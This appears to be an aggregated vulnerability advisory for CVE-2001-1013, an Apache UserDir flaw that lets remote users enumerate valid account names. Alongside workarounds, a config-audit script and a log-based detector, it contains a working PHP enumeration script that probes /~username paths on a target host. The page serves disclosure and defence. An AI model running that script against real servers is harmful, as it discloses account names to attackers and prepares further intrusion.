CVE-2001-1013
CVSS 5.0
Published: 2001-09-12 00:00:00
Revised: 2008-09-05 16:25:28

[Original] Apache on Red Hat Linux with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.


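[CNNVD] Red Hat Linux Apache remote username enumeration vulnerability (CNNVD-200109-044)

        The Apache shipped with Red Hat Linux 7.0 contains a configuration error that may allow a remote attacker to enumerate the users that exist on the host.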

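- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: NONE [no impact on system integrity]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definition found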

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1013
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1013
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200109-044
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/3335
(VENDOR_ADVISORY)  BID  3335
http://xforce.iss.net/static/7129.php
(VENDOR_ADVISORY)  XF  linux-apache-username-exists(7129)
http://www.securityfocus.com/archive/1/213667
(VENDOR_ADVISORY)  BUGTRAQ  20010912 Is there user Anna at your host ?
http://archives.neohapsis.com/archives/vuln-dev/2000-q3/0094.html
(VENDOR_ADVISORY)  VULN-DEV  20000707 Re: your mail
http://archives.neohapsis.com/archives/vuln-dev/2000-q3/0087.html
(UNKNOWN)  VULN-DEV  20000707 Re: apache and 404/404 status codes
http://archives.neohapsis.com/archives/vuln-dev/2000-q3/0083.html
(VENDOR_ADVISORY)  VULN-DEV  20000707 (no subject)

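- Vulnerability information

Red Hat Linux Apache remote username enumeration vulnerability
Medium severity, configuration error
2001-09-12 00:00:00 2012-11-28 00:00:00
Remote
        The Apache shipped with Red Hat Linux 7.0 contains a configuration error that may allow a remote attacker to enumerate the users that exist on the host.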

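- Advisories and patches

        We recommend applying the following temporary workarounds until a patch is installed:

        1. Disable the "UserDir" option, which is enabled by default

        % echo 'UserDir Disabled' >> /var/www/conf/httpd.conf

        2. Replace the path name with a URL

        % echo 'ErrorDocument 404 http://localhost/sample.html' >> /var/www/conf/httpd.conf
        % echo 'ErrorDocument 403 http://localhost/sample.html' >> /var/www/conf/httpd.conf
        % sudo apachectl restart

        Vendor patch:

        The vendor has not yet provided a patch or upgrade. Users of this software should watch the vendor's home page for the latest version:

        http://www.redhat.com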

        
        
        

- Vulnerability information (21112)

Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability (EDBID:21112)
linux remote
2001-09-12 Verified
0 Gabriel A Maggiotti
N/A [click to download]
source: http://www.securityfocus.com/bid/3335/info

Versions of Apache webserver shipping with Red Hat Linux 7.0 (and possibly other Apache distributions) install with a default misconfiguration which could allow remote users to determine whether a given username exists on the vulnerable system.

http://www.example.com/~<username>

When a remote user makes a request for a possible user's default home page, the server returns one of three responses:

In a case where <username> is a valid user account, and has been configured with a homepage, the server responds with the user's homepage.

When <username> exists on the system, but has not been assigned a homepage document, the server returns the message "You don't have permission to access /~username on this server."

However, if the tested username does not exist as an account on the system, the Apache server's response includes the message "The requested URL /~username was not found on this server."

Because the server responds differently in the latter two cases, a remote user can test and enumerate possible usernames. Properly exploited, this information could be used in further attacks on the vulnerable hos

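#!/usr/local/bin/php -q
<?php
/*
default misconfiguration which could allow remote users
to determine whether a given username exists on the vulnerable system.

        By Gabriel A Maggiotti
 */

// Expect exactly three arguments: host, username list file, delay.
if ($argc != 4) {
        echo "usage: $argv[0] <host> <userlist> <delay>\n";
        exit(1);
}

$host = $argv[1];
$userlist = $argv[2];

$fd = fopen($userlist, "r");
if ($fd === false) {
        echo "cannot open $userlist\n";
        exit(1);
}

while (!feof($fd)) {
        // fgets() keeps the line ending, so strip it before building the request.
        $user = trim((string) fgets($fd, 4096));
        if ($user === "") {
                continue;
        }

        // $errno and $errstr are filled in by fsockopen() itself; call-time
        // pass-by-reference (&$errno) is a syntax error in current PHP.
        $fp = fsockopen($host, 80, $errno, $errstr, 30);
        if ($fp === false) {
                echo "connect failed: $errstr\n";
                break;
        }
        fputs($fp, "GET /~$user HTTP/1.0\r\n\r\n");
        while (!feof($fp)) {
                $sniff = fgets($fp, 1024);
                // The 403 page for an existing account contains "permission".
                if ($sniff !== false && strpos($sniff, "permission") !== false) {
                        echo "$user exists!!!\n";
                        break;
                }
        }
        fclose($fp);
        // The <delay> argument is accepted but unused; the pause is fixed at 3 seconds.
        sleep(3);
}

fclose($fd);

?>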
		

- Vulnerability information

637
Apache HTTP Server UserDir Directive Username Enumeration
Remote / Network Access Information Disclosure
Loss of Confidentiality
Exploit Public

- Vulnerability description

Apache web servers contain a flaw that may lead to an unauthorized information disclosure. The issue is triggered when the UserDir module is enabled and a remote attacker requests access to a user's home directory. By monitoring the web server response, an attacker is able to enumerate valid user names, resulting in a loss of confidentiality.

- Timeline

2000-07-07 Unknown
2000-07-07 Unknown

- Solution

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround(s):

Workaround 1: Disable the default-enabled UserDir directive in httpd.conf: UserDir Disabled

Workaround 2: Set generic error pages for 403/404 messages in httpd.conf.
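An audit of httpd.conf text for the two workarounds, added here as an example and not taken from any advisory. It relies on the fact that Apache answers an ErrorDocument given as a full URL with a redirect, so the client no longer sees the original 403 or 404 status, whereas a local path keeps the status code. The function name and the sample configurations are constructed; the check assumes mod_userdir is loaded with UserDir enabled by default and ignores per-user lists and container scoping.

```python
def audit_userdir_exposure(conf_text):
    """Report whether either workaround for the UserDir leak is in place."""
    userdir_disabled = False
    errdoc = {}
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):      # blank line or comment
            continue
        parts = line.split()
        name = parts[0].lower()                   # directive names are case-insensitive
        if name == "userdir" and len(parts) == 2 and parts[1].lower() == "disabled":
            userdir_disabled = True               # global disable, no username list
        elif name == "errordocument" and len(parts) >= 3:
            errdoc[parts[1]] = parts[2].strip('"')
    e403, e404 = errdoc.get("403"), errdoc.get("404")
    # Only an identical external URL for both codes hides the 403/404 difference.
    uniform = (e403 is not None and e403 == e404
               and e403.lower().startswith(("http://", "https://")))
    return {"userdir_disabled": userdir_disabled,
            "uniform_errors": uniform,
            "exposed": not (userdir_disabled or uniform)}

# Constructed sample configurations.
DEFAULT_CONF = "UserDir public_html\n"
WORKAROUND_1 = DEFAULT_CONF + "UserDir Disabled\n"
WORKAROUND_2 = DEFAULT_CONF + (
    "ErrorDocument 404 http://localhost/sample.html\n"
    "ErrorDocument 403 http://localhost/sample.html\n")
LOCAL_PAGES = DEFAULT_CONF + (
    "ErrorDocument 404 /sample.html\n"
    "ErrorDocument 403 /sample.html\n")

if __name__ == "__main__":
    for label, conf in [("default", DEFAULT_CONF), ("workaround 1", WORKAROUND_1),
                        ("workaround 2", WORKAROUND_2), ("local pages", LOCAL_PAGES)]:
        print(label, audit_userdir_exposure(conf))
```

The "local pages" case is reported as exposed because identical page bodies still arrive with different status codes.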

- Related references

- Vulnerability author

- Vulnerability information

Red Hat Linux Apache Remote Username Enumeration Vulnerability
Configuration Error 3335
Yes No
2001-09-12 12:00:00 2009-07-11 07:56:00
Reported to bugtraq by Alexander A. Kelner <akson@tts.debryansk.ru> on September 12, 2001.

- Affected program versions

RedHat Linux 7.0

- Vulnerability discussion

Versions of Apache webserver shipping with Red Hat Linux 7.0 (and possibly other Apache distributions) install with a default misconfiguration which could allow remote users to determine whether a given username exists on the vulnerable system.

http://www.example.com/~<username>

When a remote user makes a request for a possible user's default home page, the server returns one of three responses:

In a case where <username> is a valid user account, and has been configured with a homepage, the server responds with the user's homepage.

When <username> exists on the system, but has not been assigned a homepage document, the server returns the message "You don't have permission to access /~username on this server."

However, if the tested username does not exist as an account on the system, the Apache server's response includes the message "The requested URL /~username was not found on this server."

Because the server responds differently in the latter two cases, a remote user can test and enumerate possible usernames. Properly exploited, this information could be used in further attacks on the vulnerable hos
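Detection logic for the probing pattern described above, added here as an example and not part of the original advisory: it scans Apache access-log lines for clients that request many distinct /~name paths answered with 403 or 404, and lists the names the server confirmed with a 403. The function name, the threshold and the log lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Common/combined log format: capture client, the ~name path segment, status.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] '
    r'"(?:GET|HEAD|POST) /~(?P<user>[^/?\s"]+)[^"]*" (?P<status>\d{3}) ')

def find_userdir_probing(lines, min_names=5):
    """Return {client: {"probed": n, "confirmed": [names]}} for clients that
    hit at least min_names distinct /~name paths answered 403 or 404."""
    seen = defaultdict(lambda: {403: set(), 404: set()})
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        status = int(m.group("status"))
        if status in (403, 404):
            seen[m.group("ip")][status].add(m.group("user"))
    report = {}
    for ip, by_status in seen.items():
        probed = by_status[403] | by_status[404]
        if len(probed) >= min_names:
            # A 403 on /~name is the response that discloses an existing account.
            report[ip] = {"probed": len(probed),
                          "confirmed": sorted(by_status[403])}
    return report

# Constructed sample log lines (documentation address ranges).
SAMPLE_LOG = """\
192.0.2.10 - - [12/Sep/2001:10:00:01 +0000] "GET /~anna HTTP/1.0" 403 284
192.0.2.10 - - [12/Sep/2001:10:00:04 +0000] "GET /~bob HTTP/1.0" 404 279
192.0.2.10 - - [12/Sep/2001:10:00:07 +0000] "GET /~carol HTTP/1.0" 404 281
192.0.2.10 - - [12/Sep/2001:10:00:10 +0000] "GET /~dave HTTP/1.0" 403 284
192.0.2.10 - - [12/Sep/2001:10:00:13 +0000] "GET /~erin HTTP/1.0" 404 280
198.51.100.7 - - [12/Sep/2001:10:02:00 +0000] "GET /~frank/ HTTP/1.1" 200 1024
198.51.100.7 - - [12/Sep/2001:10:02:05 +0000] "GET /~frank/old.html HTTP/1.1" 404 290
198.51.100.7 - - [12/Sep/2001:10:02:09 +0000] "GET /index.html HTTP/1.1" 200 512
""".splitlines()

if __name__ == "__main__":
    print(find_userdir_probing(SAMPLE_LOG))
```

The names under "confirmed" are the accounts whose existence the server disclosed to that client, which makes them the ones to review first.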

- Exploit

apachex.php courtesy Gabriel A Maggiotti <gmaggiot@ciudad.com.ar>. A new exploit program has been made available by m00 Security.

- Solution

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Related references
